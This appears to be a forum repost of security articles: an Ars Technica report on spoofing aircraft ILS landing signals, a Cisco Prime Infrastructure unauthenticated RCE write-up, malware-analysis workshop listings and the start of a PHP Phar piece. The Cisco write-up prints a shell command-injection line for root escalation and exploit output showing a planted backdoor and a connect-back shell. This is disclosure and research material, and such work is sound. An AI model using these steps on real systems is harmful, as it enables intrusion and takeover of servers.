v/06sDJlXMNpZbSd5Fq95YfZd4l9Vr9VrvKXfbomn+akwUymP8RDyc6Z8BzjF4Y5
02m6Ts0J0MnSYfEDqJPPZbMGB+GAgAqLs7FrZJQzOZTiOXOSIJsKMYsPIDWE8lXv
s77rs0rGvgvQfWzPsJlMIx6ryrMnAsfOkzM2GChGNX9+pABpgOdYII4bABEBAAGJ
Ah8EGAECAAkFAlIp+7QCGwwACgkQyPABKoQhYr+hrg/9Er0+HN78y6UWGFHu/KVK
d8M6ekaqjQndQXmzQaPQwsOHOvWdC+EtBoTdR3VIjAtX96uvzCRV3sb0XPB9S9eP
gRrO/t5+qTVTtjua1zzjZsMOr1SxhBgZ5+0U2aoY1vMhyIjUuwpKKNqj2uf+uj5Y
ZQbCNklghf7EVDHsYQ4goB9gsNT7rnmrzSc6UUuJOYI2jjtHp5BPMBHh2WtUVfYP
8JqDfQ+eJQr5NCFB24xMW8OxMJit3MGckUbcZlUa1wKiTb0b76fOjt0y/+9u1ykd
X+i27DAM6PniFG8BfqPq/E3iU20IZGYtaAFBuhhDWR3vGY4+r3OxdlFAJfBG9XDD
aEDTzv1XF+tEBo69GFaxXZGdk9//7qxcgiya4LL9Kltuvs82+ZzQhC09p8d3YSQN
cfaYObm4EwbINdKP7cr4anGFXvsLC9urhow/RNBLiMbRX/5qBzx2DayXtxEnDlSC
Mh7wCkNDYkSIZOrPVUFOCGxu7lloRgPxEetM5x608HRa3hDHoe5KvUBmmtavB/aR
zlGuZP1S6Y7S13ytiULSzTfUxJmyGYgNo+4ygh0i6Dudf9NLmV+i9aEIbLbd6bni
1B/y8hBSx3SVb4sQVRe3clBkfS1/mYjlldtYjzOwcd02x599KJlcChf8HnWFB7qT
zB3yrr+vYBT0uDWmxwPjiJs=
=ytEf
-----END PGP PUBLIC KEY BLOCK-----

Source: https://github.com/vanhauser-thc/thc-hydra
-
The radio navigation planes use to land safely is insecure and can be hacked

Radios that sell for $600 can spoof signals planes use to find runways.

Dan Goodin - 5/15/2019, 1:00 PM

A plane in the researchers' demonstration attack as spoofed ILS signals induce a pilot to land to the right of the runway. Sathaye et al.

Just about every aircraft that has flown over the past 50 years—whether a single-engine Cessna or a 600-seat jumbo jet—is aided by radios to safely land at airports. These instrument landing systems (ILS) are considered precision approach systems, because unlike GPS and other navigation systems, they provide crucial real-time guidance about both the plane's horizontal alignment with a runway and its vertical angle of descent. In many settings—particularly during foggy or rainy night-time landings—this radio-based navigation is the primary means for ensuring planes touch down at the start of a runway and on its centerline.

Like many technologies built in earlier decades, the ILS was never designed to be secure from hacking. Radio signals, for instance, aren't encrypted or authenticated. Instead, pilots simply assume that the tones their radio-based navigation systems receive on a runway's publicly assigned frequency are legitimate signals broadcast by the airport operator. This lack of security hasn't been much of a concern over the years, largely because the cost and difficulty of spoofing malicious radio signals made attacks infeasible.

Now, researchers have devised a low-cost hack that raises questions about the security of ILS, which is used at virtually every civilian airport throughout the industrialized world. Using a $600 software defined radio, the researchers can spoof airport signals in a way that causes a pilot's navigation instruments to falsely indicate a plane is off course.
Normal training calls for the pilot to adjust the plane's descent rate or alignment accordingly, creating the potential for an accident as a result.

One attack technique is for spoofed signals to indicate that a plane's angle of descent is more gradual than it actually is. The spoofed message would generate what is sometimes called a "fly down" signal that instructs the pilot to steepen the angle of descent, possibly causing the aircraft to touch the ground before reaching the start of the runway.

The video below shows a different way spoofed signals can pose a threat to a plane that is in its final approach. Attackers can send a signal that causes a pilot's course deviation indicator to show that a plane is slightly too far to the left of the runway, even when the plane is perfectly aligned. The pilot will react by guiding the plane to the right and inadvertently steer over the centerline.

Wireless Attacks on Aircraft Landing Systems.

The researchers, from Northeastern University in Boston, consulted a pilot and security expert during their work, and all are careful to note that this kind of spoofing isn't likely to cause a plane to crash in most cases. ILS malfunctions are a known threat to aviation safety, and experienced pilots receive extensive training in how to react to them. A plane that's misaligned with a runway will be easy for a pilot to visually notice in clear conditions, and the pilot will be able to initiate a missed approach fly-around.

Another reason for measured skepticism is the difficulty of carrying out an attack. In addition to the SDR, the equipment needed would likely require directional antennas and an amplifier to boost the signal. It would be hard to sneak all that gear onto a plane in the event the hacker chose an onboard attack. If the hacker chose to mount the attack from the ground, it would likely require a great deal of work to get the gear aligned with a runway without attracting attention.
What's more, airports typically monitor for interference on sensitive frequencies, making it possible an attack would be shut down shortly after it started.

In 2012, researcher Brad Haines, who often goes by the handle Renderman, exposed vulnerabilities in the automatic dependent surveillance broadcast—the broadcast systems planes use to determine their location and broadcast it to others. He summed up the difficulties of real-world ILS spoofing this way:

If everything lined up for this, location, concealment of gear, poor weather conditions, a suitable target, a motivated, funded and intelligent attacker, what would their result be? At absolute worst, a plane hits the grass and some injuries or fatalities are sustained, but emergency crews and plane safety design means you're unlikely to have a spectacular fire with all hands lost. At that point, airport landings are suspended, so the attacker can't repeat the attack. At best, pilot notices the misalignment, browns their shorts, pulls up and goes around and calls in a maintenance note that something is funky with the ILS and the airport starts investigating, which means the attacker is not likely wanting to stay nearby.

So if all that came together, the net result seems pretty minor. Compare that to the return on investment and economic effect of one jackass with a $1,000 drone flying outside Heathrow for 2 days. Bet the drone was far more effective and certain to work than this attack.

Still, the researchers said that risks exist. Planes that aren’t landing according to the glide path—the imaginary vertical path a plane follows when making a perfect landing—are much harder to detect even when visibility is good. What’s more, some high-volume airports, to keep planes moving, instruct pilots to delay making a fly-around decision even when visibility is extremely limited.
The Federal Aviation Administration’s Category III approach operations, which are in effect for many US airports, call for a decision height of just 50 feet, for instance. Similar guidelines are in effect throughout Europe. Those guidelines leave a pilot with little time to safely abort a landing should a visual reference not line up with ILS readings.

“Detecting and recovering from any instrument failures during crucial landing procedures is one of the toughest challenges in modern aviation,” the researchers wrote in their paper, titled Wireless Attacks on Aircraft Instrument Landing Systems, which has been accepted at the 28th USENIX Security Symposium. “Given the heavy reliance on ILS and instruments in general, malfunctions and adversarial interference can be catastrophic especially in autonomous approaches and flights.”

What happens with ILS failures

Several near-catastrophic landings in recent years demonstrate the danger posed from ILS failures. In 2011, Singapore Airlines flight SQ327, with 143 passengers and 15 crew aboard, unexpectedly banked to the left about 30 feet above a runway at the Munich airport in Germany. Upon landing, the Boeing 777-300 careened off the runway to the left, then veered to the right, crossed the centerline, and came to a stop with all of its landing gear in the grass to the right of the runway. The image directly below shows the aftermath. The image below that depicts the course the plane took.

An instrument landing system malfunction caused Singapore Airlines flight SQ327 to slide off the runway shortly after landing in Munich in 2011. German Federal Bureau of Aircraft Accident Investigation

The path Singapore Airlines flight SQ327 took after landing.

An incident report published by Germany’s Federal Bureau of Aircraft Accident Investigation said that the jet missed its intended touch down point by about 1,600 feet.
Investigators said one contributor to the accident was localizer signals that had been distorted by a departing aircraft. While there were no reported injuries, the event underscored the severity of ILS malfunctions. Other near-catastrophic accidents involving ILS failures are an Air New Zealand flight NZ 60 in 2000 and a Ryanair flight FR3531 in 2013. The following video helps explain what went wrong in the latter event.

Animation - Stick shaker warning and Pitch-up Upsets.

Vaibhav Sharma runs global operations for a Silicon Valley security company and has flown small aviation airplanes since 2006. He is also a licensed Ham Radio operator and volunteer with the Civil Air Patrol, where he is trained as a search-and-rescue flight crew and radio communications team member. He’s the pilot controlling the X-Plane flight simulator in the video demonstrating the spoofing attack that causes the plane to land to the right of the runway. Sharma told Ars:

This ILS attack is realistic but the effectiveness will depend on a combination of factors including the attacker's understanding of the aviation navigation systems and conditions in the approach environment. If used appropriately, an attacker could use this technique to steer aircraft towards obstacles around the airport environment and if that was done in low visibility conditions, it would be very hard for the flight crew to identify and deal with the deviations.

He said the attacks had the potential to threaten both small aircraft and large jet planes but for different reasons. Smaller planes tend to move at slower speeds than big jets. That gives pilots more time to react. Big jets, on the other hand, typically have more crew members in the cockpit to react to adverse events, and pilots typically receive more frequent and rigorous training. The most important consideration for both big and small planes, he said, is likely to be environmental conditions, such as weather at the time of landing.
“The type of attack demonstrated here would probably be more effective when the pilots have to depend primarily on instruments to execute a successful landing,” Sharma said. “Such cases include night landings with reduced visibility or a combination of both in a busy airspace requiring pilots to handle much higher workloads and ultimately depending on automation.”

Aanjhan Ranganathan, a Northeastern University researcher who helped develop the attack, told Ars that GPS systems provide little fallback when ILS fails. One reason: the types of runway misalignments that would be effective in a spoofing attack typically range from about 32 feet to 50 feet, since pilots or air traffic controllers will visually detect anything bigger. It’s extremely difficult for GPS to detect malicious offsets that small. A second reason is that GPS spoofing attacks are relatively easy to carry out. “I can spoof GPS in synch with this [ILS] spoofing,” Ranganathan said. “It’s a matter of how motivated the attacker is.”

An ILS primer

Tests on ILS began as early as 1929, and the first fully operational system was deployed in 1932 at Germany’s Berlin Tempelhof Central Airport. ILS remains one of the most effective navigation systems for landing. Alternative approach systems such as VHF Omnidirectional Range, Non-Directional Beacon, global positioning system, and similar satellite navigation are referred to as non-precision because they provide only horizontal or lateral guidance. ILS, by contrast, is considered a precision approach system because it gives both horizontal and vertical (i.e. glide path) guidance. In recent decades, use of non-precision approach systems has decreased. ILS, meanwhile, has increasingly been folded into autopilot and autoland systems.

An overview of ILS, showing localizer, glideslope, and marker beacons. Sathaye et al.

There are two key components to ILS.
A “localizer” tells a pilot if the plane is too far to the left or right of the runway centerline, while a “glideslope” indicates if the angle of descent is too big to put the plane on the ground at the start of the runway. (A third key component is known as “marker beacons.” They act as checkpoints that enable the pilot to determine the aircraft’s distance to the runway. Over the years, marker beacons have gradually been replaced with GPS and other technologies.)

The localizer uses two sets of antennas that broadcast two tones—one at 90Hz and the other at 150Hz—on a frequency that’s publicly assigned to a given runway. The antenna arrays are positioned on both sides of the runway, usually beyond the departure end, in such a way that the tones cancel each other out when an approaching plane is positioned directly over the runway centerline. The course deviation indicator needle will present a vertical line that’s in the center.

If the plane veers to the right, the 150Hz tone grows increasingly dominant, causing the course deviation indicator needle to move off-center. If the plane veers to the left of the centerline, the 90Hz tone grows increasingly dominant, and the needle will move to the right. While a localizer isn’t an absolute substitute for visually monitoring a plane’s alignment, it provides key, highly intuitive guidance. Pilots need only keep the needle in the center to ensure the plane is directly over the centerline.

Sathaye, et al.

A glideslope works in much the same way except it provides guidance about the plane’s angle of descent relative to the start of the runway. When an approaching plane’s descent angle is too little, a 90Hz tone becomes dominant, causing instruments to indicate the plane should fly down. When the descent is too fast, a 150Hz tone indicates the plane should fly higher. When a plane stays on the prescribed glide-path angle of about three degrees, the two tones cancel each other out.
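The needle behaviour described above can be captured in a few lines of code. The sketch below is a deliberately simplified model of the difference-in-depth-of-modulation (DDM) idea behind a localizer receiver; the constants and function names are illustrative assumptions, not avionics values or real receiver code.

```python
# Simplified, illustrative model of an ILS localizer course deviation
# indicator (CDI). The receiver compares how strongly the carrier is
# modulated by the 90 Hz and 150 Hz tones; the difference (DDM) drives
# the needle. All numbers here are assumptions for illustration.

def cdi_deflection(mod_90: float, mod_150: float) -> float:
    """Return a needle deflection in the range [-1, 1].

    Positive means 'fly right' (90 Hz dominant, aircraft left of the
    centerline); negative means 'fly left' (150 Hz dominant, aircraft
    right of the centerline); 0.0 means the tones cancel out.
    """
    ddm = mod_90 - mod_150   # difference in depth of modulation
    full_scale = 0.155       # DDM giving full-scale deflection (assumed)
    return max(-1.0, min(1.0, ddm / full_scale))

# On the centerline both tones cancel and the needle stays centered:
print(cdi_deflection(0.20, 0.20))  # prints 0.0

# Aircraft drifts right of the centerline: 150 Hz dominates, fly left:
print(cdi_deflection(0.18, 0.26))
```

A spoofer only has to transmit a tone pair whose relative modulation depths encode whatever deflection it wants the needle to show, which is why overpowering the legitimate signal is enough to move the indicator.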
The two glide-slope antennas are mounted on a tower at specific heights defined by the glide-path angle suitable for a particular airport. The tower is usually located near the touchdown zone of the runway.

Seamless spoofing

The Northeastern University researchers’ attack uses commercially available software defined radios. These devices, which cost between $400 and $600, transmit signals that impersonate the legitimate ones sent by an airport ILS. The attacker’s transmitter can be located either onboard a targeted plane or on the ground, as far as three miles from the airport. As long as the malicious signal is stronger than the legitimate one reaching the approaching aircraft, the ILS receiver will lock into the attacker signal and display attacker-controlled alignments to horizontal or vertical flight paths.

The experiment setup. Sathaye et al.

Unless the spoofing is done carefully, there will be sudden or erratic shifts in instrument readings that would alert a pilot to an ILS malfunction. To make the spoofing harder to detect, the attacker can tap into the precise location of an approaching plane using the Automatic Dependent Surveillance–Broadcast, a system that transmits a plane’s GPS location, altitude, ground speed, and other data to ground stations and other aircraft once per second.

Using this information, an attacker can start the spoofing when an approaching plane is either to the left or right of the runway and send a signal that shows the aircraft is aligned. An optimal time to initiate the attack would be shortly after the targeted plane has passed through a waypoint, as shown in the demonstration video near the beginning of this article. The attacker would then use a real-time offset correction and signal generation algorithm that continuously adjusts the malicious signal to ensure the misalignment is consistent with the actual movements of the plane.
Even if attackers don’t have the sophistication to make spoofing seamless, they could still use malicious signals to create denial-of-service attacks that would prevent pilots from relying on ILS systems as they land.

The offset correction algorithm takes into account an aircraft's real-time position to calculate the difference in the spoofed offset and the current offset. Sathaye et al.

One variety of spoofing is known as an overshadow attack. It sends carefully crafted tones with a higher signal strength that overpower the ones sent by the airport ILS transmitter. A malicious radio on the ground would typically have to transmit signals of 20 watts. Overshadow attacks have the advantage of making seamless takeovers easier to do.

An overshadow attack. Sathaye et al.

A second spoofing variety, known as a single-tone attack, has the advantage of working by sending a single frequency tone at a signal strength that’s lower than the airport ILS transmitter. It comes with several disadvantages, including requiring an attacker to know specific details about a targeted plane, like where its ILS antennas are located, for the spoofing to be seamless.

A single-tone attack. Sathaye et al.

No easy fix

So far, the researchers said, there are no known ways to mitigate the threat posed by spoofing attacks. Alternative navigation technologies—including VHF omnidirectional range, non-directional beacons, distance measurement equipment, and GPS—all use unauthenticated wireless signals and are therefore vulnerable to their own spoofing attacks. What’s more, only ILS and GPS are capable of providing both lateral and vertical approach guidance.
In the paper, researchers Harshad Sathaye, Domien Schepers, Aanjhan Ranganathan, and Guevara Noubir of Northeastern University’s Khoury College of Computer Sciences went on to write:

Most security issues faced by aviation technologies like ADS-B, ACARS and TCAS can be fixed by implementing cryptographic solutions. However, cryptographic solutions are not sufficient to prevent localization attacks. For example, cryptographically securing GPS signals similar to military navigation can only prevent spoofing attacks to an extent. It would still be possible for an attacker to relay the GPS signals with appropriate timing delays and succeed in a GPS location or time spoofing attack. One can derive inspiration from existing literature on mitigating GPS spoofing attacks and build similar systems that are deployed at the receiver end. An alternative is to implement a wide-area secure localization system based on distance bounding and secure proximity verification techniques [44]. However, this would require bidirectional communication and warrant further investigation with respect to scalability, deployability etc.

Federal Aviation Administration officials said they didn't know enough about the researchers' demonstration attack to comment.

The attack and the significant amount of research that went into it are impressive, but the paper leaves a key question unanswered—how likely is it that someone would expend the considerable amount of work required to carry out such an attack in the real world? Other types of vulnerabilities that, say, allow hackers to remotely install malware on computers or bypass widely used encryption protections are often easy to monetize. That’s not the case with an ILS spoofing attack. Life-threatening hacks against pacemakers and other medical devices also belong in this latter attack category. While it is harder to envision the motivation for such hacks, it would be a mistake to rule them out.
A report published in March by C4ADS, a nonprofit that covers global conflict and transnational security issues, found that the Russian Federation has engaged in frequent, large-scale GPS spoofing exercises that cause ship navigation systems to show they are 65 or more miles from their true location.

“The Russian Federation has a comparative advantage in the targeted use and development of GNSS spoofing capabilities,” the report warned, referring to Global Navigation Satellite Systems. “However, the low cost, commercial availability, and ease of deployment of these technologies will empower not only states, but also insurgents, terrorists, and criminals in a wide range of destabilizing state-sponsored and non-state illicit networks.”

While ILS spoofing seems esoteric in 2019, it wouldn’t be a stretch to see it become more banal in the coming years, as attack techniques become better understood and software defined radios become more common. ILS attacks don’t necessarily have to be carried out with the intention of causing accidents. They could also be done with the goal of creating disruptions in much the way rogue drones closed London’s Gatwick Airport for several days last December, just days before Christmas, and then Heathrow three weeks later.

“Money is one motivation, but display of power is another,” Ranganathan, the Northeastern University researcher, said. "From a defense perspective, these are very critical attacks. It’s something that needs to be taken care of because there are enough people in this world who want to display power.”

Sursa: https://arstechnica.com/information-technology/2019/05/the-radio-navigation-planes-use-to-land-safely-is-insecure-and-can-be-hacked/
-
Panic! at the Cisco :: Unauthenticated Remote Code Execution in Cisco Prime Infrastructure

May 17, 2019

Not all directory traversals are the same. The impact can range depending on what the traversal is used for and how much user interaction is needed. As you will find out, this simple bug class can be hard to spot in code and can have a devastating impact. Cisco patched this vulnerability as CVE-2019-1821 in Prime Infrastructure, however I am uncertain of the patch details and since I cannot test it (I don’t have access to a Cisco license), I decided to share the details here in the hope that someone else can verify its robustness.

TL;DR

In this post, I discuss the discovery and exploitation of CVE-2019-1821 which is an unauthenticated server side remote code execution vulnerability, just the type of bug we will cover in our training class Full Stack Web Attack. The only interaction that is required is that an admin opens a link to trigger the XSS.

Introduction

The Cisco website explains what Prime Infrastructure (PI) is:

Cisco Prime Infrastructure has what you need to simplify and automate management tasks while taking advantage of the intelligence of your Cisco networks. Product features and capabilities help you …consolidate products, manage the network for mobile collaboration, simplify WAN management…

Honestly, I still couldn’t understand what the intended use case is, so I decided to go to Wikipedia.

Cisco Prime is a network management software suite consisting of different software applications by Cisco Systems. Most applications are geared towards either Enterprise or Service Provider networks.

Thanks to Wikipedia, it was starting to make sense and it looks like I am not the only one confused to what this product actually does. Needless to say, that doesn’t always matter when performing security research.
The Target

At the time, I tested this bug on the PI-APL-3.4.0.0.348-1-K9.iso (d513031f481042092d14b77cd03cbe75) installer with the patch PI_3_4_1-1.0.27.ubf (56a2acbcf31ad7c238241f701897fcb1) applied. That patch was supposed to prevent Pedro’s bug, CVE-2018-15379. However, as we will see, a single CVE was given to two different vulnerabilities and only one of them was patched.

    piconsole/admin# show version
    Cisco Prime Infrastructure
    ********************************************************
    Version : 3.4.0
    Build : 3.4.0.0.348
    Critical Fixes:
            PI 3.4.1 Maintenance Release ( 1.0.0 )

After performing a default install, I needed to setup high availability to reach the target code. This is standard practice when setting up a Cisco Prime Infrastructure install as stated in the documentation that I followed. It looks like a complicated process but essentially it boiled down to deploying two different PI installs and configuring one to be a primary HA server and other to be a secondary HA server.

High level view of High Availability

After using gigs of ram and way too much diskspace in my lab, the outcome looked like this:

A correctly configured High Availability environment

Additionally, I had a friend confirm the existence of this bug on version 3.5 before reporting it directly to Cisco.

The Vulnerability

Inside of the /opt/CSCOlumos/healthmonitor/webapps/ROOT/WEB-INF/web.xml file we find the following entry:

    <!-- Fileupload Servlet -->
    <servlet>
        <servlet-name>UploadServlet</servlet-name>
        <display-name>UploadServlet</display-name>
        <servlet-class>
            com.cisco.common.ha.fileutil.UploadServlet
        </servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>UploadServlet</servlet-name>
        <url-pattern>/servlet/UploadServlet</url-pattern>
    </servlet-mapping>

This servlet is part of the Health Monitor application and requires a high availability server to be configured and connected. See target.
Now, inside of the /opt/CSCOlumos/lib/pf/rfm-3.4.0.403.24.jar file, we can find the corresponding code for the UploadServlet class:

    public class UploadServlet extends HttpServlet {
        private static final String FILE_PREFIX = "upload_";
        private static final int ONE_K = 1024;
        private static final int HTTP_STATUS_500 = 500;
        private static final int HTTP_STATUS_200 = 200;
        private boolean debugTar = false;

        public void init() {}

        public void doPost(HttpServletRequest request, HttpServletResponse response)
                throws IOException, ServletException {
            String fileName = null;
            long fileSize = 0L;
            boolean result = false;
            response.setContentType("text/html");
            String destDir = request.getHeader("Destination-Dir");       // 1
            String archiveOrigin = request.getHeader("Primary-IP");      // 2
            String fileCount = request.getHeader("Filecount");           // 3
            fileName = request.getHeader("Filename");                    // 4
            String sz = request.getHeader("Filesize");                   // 5
            if (sz != null) {
                fileSize = Long.parseLong(sz);
            }
            String compressed = request.getHeader("Compressed-Archive"); // 6
            boolean archiveIsCompressed;
            boolean archiveIsCompressed;
            if (compressed.equals("true")) {
                archiveIsCompressed = true;
            } else {
                archiveIsCompressed = false;
            }
            AesLogImpl.getInstance().info(128, new Object[] { "Received archive=" + fileName,
                " size=" + fileSize + " from " + archiveOrigin + " containing " + fileCount +
                " files to be extracted to: " + destDir });
            ServletFileUpload upload = new ServletFileUpload();
            upload.setSizeMax(-1L);
            PropertyManager pmanager = PropertyManager.getInstance(archiveOrigin); // 7
            String outDir = pmanager.getOutputDirectory();                         // 8
            File fOutdir = new File(outDir);
            if (!fOutdir.exists()) {
                AesLogImpl.getInstance().info(128, new Object[] {
                    "UploadServlet: Output directory for archives " + outDir +
                    " does not exist. Continuing..."
                });
            }
            String debugset = pmanager.getProperty("DEBUG");
            if ((debugset != null) && (debugset.equals("true"))) {
                this.debugTar = true;
                AesLogImpl.getInstance().info(128, new Object[] {
                    "UploadServlet: Debug setting is specified" });
            }
            try {
                FileItemIterator iter = upload.getItemIterator(request);
                while (iter.hasNext()) {
                    FileItemStream item = iter.next();
                    String name = item.getFieldName();
                    InputStream stream = item.openStream(); // 9
                    if (item.isFormField()) {
                        AesLogImpl.getInstance().error(128, new Object[] {
                            "Form field input stream with name " + name +
                            " detected. Abort processing" });
                        response.sendError(500, "Servlet does not handle FormField uploads.");
                        return;
                    }
                    // 10
                    result = processFileUploadStream(item, stream, destDir, archiveOrigin,
                        archiveIsCompressed, fileName, fileSize, outDir);
                    stream.close();
                }
            }

At [1], [2], [3], [4], [5] and [6], the code gets 6 input parameters from an attacker controlled request. They are the destDir, archiveOrigin, fileCount, fileName, fileSize (which is a long value) and compressed (which is a boolean). Then at [7] we need to supply a correct Primary-IP so that we get a valid outDir at [8]. Then at [9] the code actually gets stream input from a file upload and then at [10] the code calls processFileUploadStream with the first 7 of the 8 parameters to the method.
    private boolean processFileUploadStream(FileItemStream item, InputStream istream,
            String destDir, String archiveOrigin, boolean archiveIsCompressed,
            String archiveName, long sizeInBytes, String outputDir) throws IOException {
        boolean result = false;
        try {
            FileExtractor extractor = new FileExtractor(); // 11
            AesLogImpl.getInstance().info(128, new Object[] {
                "processFileUploadStream: Start extracting archive = " + archiveName +
                " size= " + sizeInBytes });
            extractor.setDebug(this.debugTar);
            result = extractor.extractArchive(istream, destDir, archiveOrigin, archiveIsCompressed); // 12

Then the code at [11] creates a new FileExtractor and then at [12] the code calls extractArchive with attacker controlled parameters istream, destDir, archiveOrigin and archiveIsCompressed.

    public class FileExtractor {
        ...
        public boolean extractArchive(InputStream ifstream, String destDirToken,
                String sourceIPAddr, boolean compressed) {
            if (ifstream == null) {
                throw new IllegalArgumentException("Tar input stream not specified");
            }
            String destDir = getDestinationDirectory(sourceIPAddr, destDirToken); // 13
            if ((destDirToken == null) || (destDir == null)) {
                throw new IllegalArgumentException("Destination directory token " + destDirToken +
                    " or destination dir=" + destDir + " for extraction of tar file not found");
            }
            FileArchiver archiver = new FileArchiver();
            boolean result = archiver.extractArchive(compressed, null, ifstream, destDir); // 14
            return result;
        }

At [13] the code calls getDestinationDirectory with our controlled sourceIPAddr and destDirToken. The destDirToken needs to be a valid directory token, so I used the tftpRoot string. Below is an abstraction taken from the HighAvailabilityServerInstanceConfig class.

    if (name.equalsIgnoreCase("tftpRoot")) {
        return getTftpRoot();
    }

At this point, we reach [14] which calls extractArchive with our parameters compressed, ifstream and destDir.

    public class FileArchiver {
        ...
        public boolean extractArchive(boolean compress, String archveName,
                InputStream istream, String userDir) {
            this.archiveName = archveName;
            this.compressed = compress;
            File destDir = new File(userDir);
            if (istream != null) {
                AesLogImpl.getInstance().trace1(128,
                    "Extract archive from stream to directory " + userDir);
            } else {
                AesLogImpl.getInstance().trace1(128,
                    "Extract archive " + this.archiveName + " to directory " + userDir);
            }
            if ((!destDir.exists()) && (!destDir.mkdirs())) {
                destDir = null;
                AesLogImpl.getInstance().error1(128,
                    "Error while creating destination dir=" + userDir +
                    " Giving up extraction of archive " + this.archiveName);
                return false;
            }
            result = false;
            if (destDir != null) {
                try {
                    setupReadArchive(istream);             // 15
                    this.archive.extractContents(destDir); // 17
                    return true;
                }

The code first calls setupReadArchive at [15]. This is important, because we set the archive variable to be an instance of the TarArchive class at [16] in the below code.

    private boolean setupReadArchive(InputStream istream) throws IOException {
        if ((this.archiveName != null) && (istream == null)) {
            try {
                this.inStream = new FileInputStream(this.archiveName);
            } catch (IOException ex) {
                this.inStream = null;
                return false;
            }
        } else {
            this.inStream = istream;
        }
        if (this.inStream != null) {
            if (this.compressed) {
                try {
                    this.inStream = new GZIPInputStream(this.inStream);
                } catch (IOException ex) {
                    this.inStream = null;
                }
                if (this.inStream != null) {
                    this.archive = new TarArchive(this.inStream, 10240); // 16
                }
            } else {
                this.archive = new TarArchive(this.inStream, 10240);
            }
        }
        if (this.archive != null) {
            this.archive.setDebug(this.debug);
        }
        return this.archive != null;
    }

Then at [17] the code calls extractContents on the TarArchive class.
    extractContents( File destDir )
            throws IOException, InvalidHeaderException {
        for ( ; ; ) {
            TarEntry entry = this.tarIn.getNextEntry();
            if ( entry == null ) {
                if ( this.debug ) {
                    System.err.println( "READ EOF RECORD" );
                }
                break;
            }
            this.extractEntry( destDir, entry ); // 18
        }
    }

At [18] the entry is extracted and finally we can see the line responsible for blindly extracting tar archives without checking for directory traversals.

    try {
        boolean asciiTrans = false;
        FileOutputStream out = new FileOutputStream( destFile ); // 19
        ...
        for ( ; ; ) {
            int numRead = this.tarIn.read( rdbuf );
            if ( numRead == -1 )
                break;
            if ( asciiTrans ) {
                for ( int off = 0, b = 0 ; b < numRead ; ++b ) {
                    if ( rdbuf[ b ] == 10 ) {
                        String s = new String ( rdbuf, off, (b - off) );
                        outw.println( s );
                        off = b + 1;
                    }
                }
            } else {
                out.write( rdbuf, 0, numRead ); // 20
            }
        }

At [19] the file is created and then finally at [20] the contents of the file is written to disk. It’s interesting to note that the vulnerable class is actually third party code written by Timothy Gerard Endres at ICE Engineering. It’s even more interesting that other projects such as radare also uses this vulnerable code!

The impact of this vulnerability is that it can allow an unauthenticated attacker to achieve remote code execution as the prime user.

Bonus

Since Cisco didn’t patch CVE-2018-15379 completely, I was able to escalate my access to root:

    python -c 'import pty; pty.spawn("/bin/bash")'
    [prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
    /opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
    sh-4.1# /usr/bin/id
    /usr/bin/id
    uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0

But wait, there is more! Another remote code execution vulnerability also exists in the source code of TarArchive.java. Can you spot it?
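To see the bug class in isolation (this sketch is illustrative Python, not the Java TarArchive code audited above), the snippet below builds a tar archive whose member name contains "../", exactly the kind of entry an extractor writes outside its destination directory when it trusts member names, and shows the canonical-path check such an extractor is missing:

```python
import io
import os
import tarfile

# Build, in memory, a tar archive whose single member uses a "../" name.
# An extractor that trusts member names blindly (as the code above does)
# would write this file *outside* the destination directory.
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    payload = b"attacker controlled content\n"
    info = tarfile.TarInfo(name="../../outside.txt")  # traversal entry
    info.size = len(payload)
    tar.addfile(info, io.BytesIO(payload))
buf.seek(0)

def is_member_safe(dest_dir: str, member_name: str) -> bool:
    """Return True only if the member resolves inside dest_dir."""
    dest = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(dest, member_name))
    return target.startswith(dest + os.sep)

# A safe extractor canonicalises and checks every member path first:
with tarfile.open(fileobj=buf, mode="r") as tar:
    for member in tar.getmembers():
        print(member.name, "safe:", is_member_safe("/tmp/extract", member.name))
```

The fix for this class of bug is exactly that check (or rejecting absolute and ".."-containing names outright) before any FileOutputStream-style write is performed.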
Proof of Concept

    saturn:~ mr_me$ ./poc.py
    (+) usage: ./poc.py <target> <connectback:port>
    (+) eg: ./poc.py 192.168.100.123 192.168.100.2:4444
    saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.2:4444
    (+) planted backdoor!
    (+) starting handler on port 4444
    (+) connection from 192.168.100.123
    (+) pop thy shell!
    python -c 'import pty; pty.spawn("/bin/bash")'
    [prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
    /opt/CSCOlumos/bin/runrshell '" && /bin/sh #'
    sh-4.1# /usr/bin/id
    /usr/bin/id
    uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0

You can download the full exploit here.

Thanks

A special shoutout goes to Omar Santos and Ron Taylor of Cisco PSIRT for communicating very effectively during the process of reporting the vulnerabilities.

Conclusion

This vulnerability survived multiple code audits by security researchers and I believe that’s because it was triggered in a component that was only reachable after configuring high availability. Sometimes it takes extra effort from the security researchers point of view to configure lab environments correctly. Finally, if you would like to learn how to perform in depth attacks like these then feel free to sign up to my training course Full Stack Web Attack in early October this year.

References

https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-prime-infrastructure.txt

Sursa: https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html
-
Reverse Engineering 101
11 sections. This workshop provides the fundamentals of reverse engineering Windows malware using a hands-on experience with RE tools and techniques.
x86
Published May 14, 2019

Reverse Engineering 102
18 sections. This workshop builds on RE101 and focuses on identifying simple encryption routines, evasion techniques, and packing.
x86, packing, encryption, evasion
Published May 17, 2019

Setting Up Your Analysis Environment
In this workshop, you will learn the basics of setting up a simple malware analysis environment.
ETA May 30, 2019

Sursa: https://malwareunicorn.org/#/workshops
-
Exploiting PHP Phar Deserialization Vulnerabilities - Part 1

May 17, 2019 by Daniel Timofte

Understanding the Inner-Workings

INTRODUCTION

